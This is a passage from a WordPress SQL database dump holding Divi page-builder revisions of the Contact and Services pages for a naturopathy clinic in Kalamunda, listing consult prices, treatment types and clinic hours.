locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/</span><span style=\"font-family: Montserrat;\">Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-10-20 14:18:44','2025-10-20 06:18:44','',26,'https://verdenaturopathy.com.au/?p=498',0,'revision','',0),(502,1,'2025-10-20 20:19:03','2025-10-20 12:19:03','','VerdeNaturopathy-PrimaryLogo-Moss','','inherit','open','closed','','verdenaturopathy-primarylogo-moss','','','2025-10-20 20:19:03','2025-10-20 12:19:03','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2025/10/VerdeNaturopathy-PrimaryLogo-Moss.png',0,'attachment','image/png',0),(503,1,'2025-10-22 10:20:12','2025-10-22 02:20:12','','square-image','','inherit','open','closed','','square-image','','','2025-10-22 10:20:12','2025-10-22 02:20:12','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2025/10/square-image.jpg',0,'attachment','image/jpeg',0),(504,1,'2025-10-22 10:20:41','2025-10-22 02:20:41','','square-image','','inherit','open','closed','','square-image-2','','','2025-10-22 10:20:41','2025-10-22 02:20:41','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2025/10/square-image.png',0,'attachment','image/png',0),(505,1,'2025-10-22 10:21:01','2025-10-22 02:21:01','https://verdenaturopathy.com.au/wp-content/uploads/2025/10/cropped-square-image.png','cropped-square-image.png','','inherit','open','closed','','cropped-square-image-png','','','2025-10-22 10:21:01','2025-10-22 02:21:01','',504,'https://verdenaturopathy.com.au/wp-content/uploads/2025/10/cropped-square-image.png',0,'attachment','image/png',0),(500,1,'2025-10-20 14:24:38','2025-10-20 06:24:38','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" custom_padding=\"||0px|||\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Naturopathic consults</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $190\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A close look into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $95\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" min_height=\"425px\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Stress strategies</span><br /><span style=\"font-family: Montserrat;\">Exercise and movement</span><br /><span style=\"font-family: Montserrat;\">Mindfulness </span><br /><span style=\"font-family: Montserrat;\">Sleep hygiene</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" parallax=\"on\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2025-10-20 14:24:38','2025-10-20 06:24:38','',424,'https://verdenaturopathy.com.au/?p=500',0,'revision','',0); INSERT INTO `wpln_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (509,1,'2026-01-03 15:41:59','2026-01-03 07:41:59','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" custom_padding=\"||0px|||\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Naturopathic consults</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $195\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A close look into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $95\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" 